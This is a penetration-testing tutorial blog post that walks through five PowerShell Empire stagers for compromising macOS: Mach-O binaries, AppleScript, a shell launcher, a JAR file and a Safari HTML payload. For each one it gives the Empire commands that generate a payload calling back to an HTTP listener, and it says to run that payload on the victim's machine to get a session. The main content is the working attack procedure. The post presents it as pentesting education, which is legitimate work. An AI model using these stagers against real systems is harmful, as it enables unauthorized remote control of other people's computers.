Multiple Ways to Exploiting OSX using PowerShell Empire
In this article, we will learn multiple ways to Exploit OSX with PowerShell Empire. There are various stages provided in Empire for this purpose, and we will cover a few of them here. The method to attack OSX is similar to that of Windows, making it a versatile approach for penetration testers. For a beginner’s guide to pen-testing OSX, click here.
Table of Content
- osx/macho
- osx/applescript
- osx/launcher
- osx/jar
- osx/safari_launcher
osx/macho
The first stage we will use to attack is osx/macho. This stage will create a Mach-O file, which is an executable format of binaries in OS X. This file format developers created specifically for OS X. This file format informs the system about the order in which it reads code and data into memory. So, this stage is quite useful when it comes to attacking OS X.
The listener creation is the same as Windows; use the HTTP listener. Once the listener is created, execute the following set of commands:
usestager osx/macho set Listener http set OutFile shell.macho execute
As the shell.macho is executed in the victim’s PC, you will have your session as shown in the image below :
osx/applescript
The next stage we will use is OSX/AppleScript. This stage will create a code in an AppleScript, this script has an automated control over scriptable Mac applications as its dedicated script for Mac. Therefore, it’s an important stage for pen-testing Mac. To create the malicious Apple script, run the following set of commands :
usestager osx/applescript set Listener http execute
Executing the above stager will create a code, run this code in the targeted system as it is shown in the following image :
As soon as the code is executed in the victim’s PC, you will have your session as shown in the image :
osx/launcher
The next stager we will use is osx/launcher. This stager is most commonly used. To execute this stager, run the following commands :
usestager osx/launcher execute
copy this code and run it in the target system’s shell. Now as soon as the code is executed, you will have your session as shown in the image below :
osx/jar
The nest stager which we will use, is osx/jar. This stager creates a jar file which is a Java archive file. This file format serves compressed Java files that run as desired when extracted. This file extension specifically caters to Java files. This stager turns out to be a suitable one when it comes to attacking OS X. Use the following set of commands to execute the said stager :
usestager osx/jar set Listener http set OutFile out.jar execute
The stager will create a jar file as described above; the attacker will execute the said file in the victim’s system, and you will have your session as shown in the image :
osx/safari_launcher
The last stager we will use is osx/safari_launcher, this will generate an HTML script for safari. For this stager, run the following set of commands:
usestager osx/safari_launcher set Listener http execute
Run the generated code in the safari of victim’s PC and so you shall have your session as shown in the image below :
To learn more about PowerShell. Follow this Link.
So, these were five ways to attack or pentest OS X. They are pretty easy and convenient. Each of them is valid and up to date.
Author: Sanjeet Kumar is an Information Security Analyst | Pentester | and Researcher. Contact Here